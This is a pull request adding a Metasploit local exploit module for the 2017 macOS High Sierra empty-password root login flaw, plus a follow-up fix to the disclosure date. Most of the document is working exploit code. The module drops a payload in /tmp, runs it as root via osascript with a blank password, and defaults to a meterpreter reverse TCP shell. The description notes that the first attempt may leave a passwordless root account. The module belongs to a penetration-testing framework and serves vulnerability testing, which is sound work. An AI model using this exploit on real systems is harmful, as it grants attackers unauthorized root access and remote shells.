### PR TITLE
add local exploit for osx root login with no password

### DIFF
--- a/modules/exploits/osx/local/root_no_password.rb
+++ b/modules/exploits/osx/local/root_no_password.rb
@@ -1,0 +1,55 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Mac OS X Root Privilege Escalation',
+      'Description'   => %q{
+        This module exploits a serious flaw in MacOSX High Sierra.
+        Any user can login with user "root", leaving an empty password.
+      },
+      'License'       => MSF_LICENSE,
+      'References'    =>
+        [
+          [ 'URL', 'https://twitter.com/lemiorhan/status/935578694541770752' ],
+          [ 'URL', 'https://news.ycombinator.com/item?id=15800676' ],
+          [ 'URL', 'https://forums.developer.apple.com/thread/79235' ],
+        ],
+      'Platform'      => 'osx',
+      'Arch'          => ARCH_X64,
+      'DefaultOptions' =>
+      {
+        'PAYLOAD'      => 'osx/x64/meterpreter_reverse_tcp',
+      },
+      'SessionTypes'  => [ 'shell', 'meterpreter' ],
+      'Targets'       => [
+        [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
+      ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Wed 29 2017'
+    ))
+  end
+
+  def exploit_cmd(root_payload)
+    "osascript -e 'do shell script \"#{root_payload}\" user name \"root\" password \"\" with administrator privileges'"
+  end
+
+  def exploit
+    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
+    print_status("Writing payload file as '#{payload_file}'")
+    write_file(payload_file, payload.raw)
+    register_file_for_cleanup(payload_file)
+    output = cmd_exec("chmod +x #{payload_file}")
+    print_status("Executing payload file as '#{payload_file}'")
+    cmd_exec(exploit_cmd(payload_file))
+  end
+end

--- a/modules/exploits/osx/local/root_no_password.rb
+++ b/modules/exploits/osx/local/root_no_password.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Local
         [ 'Mac OS X 10.13.1 High Sierra x64 (Native Payload)', { } ]
       ],
       'DefaultTarget' => 0,
-      'DisclosureDate' => 'Wed 29 2017'
+      'DisclosureDate' => 'Nov 29 2017'
     ))
   end
 


### PR DESCRIPTION
This pull request adds a module for the OSX root password login vulnerability.
This probably needs a bit of work, but I thought I would pr it early so people can test if they are vulnerable.
The vulnerability might fail the first time (leaving a root user with no password).
Perhaps we should add a warning for this?
The second attempt should gain a session with uid 0.
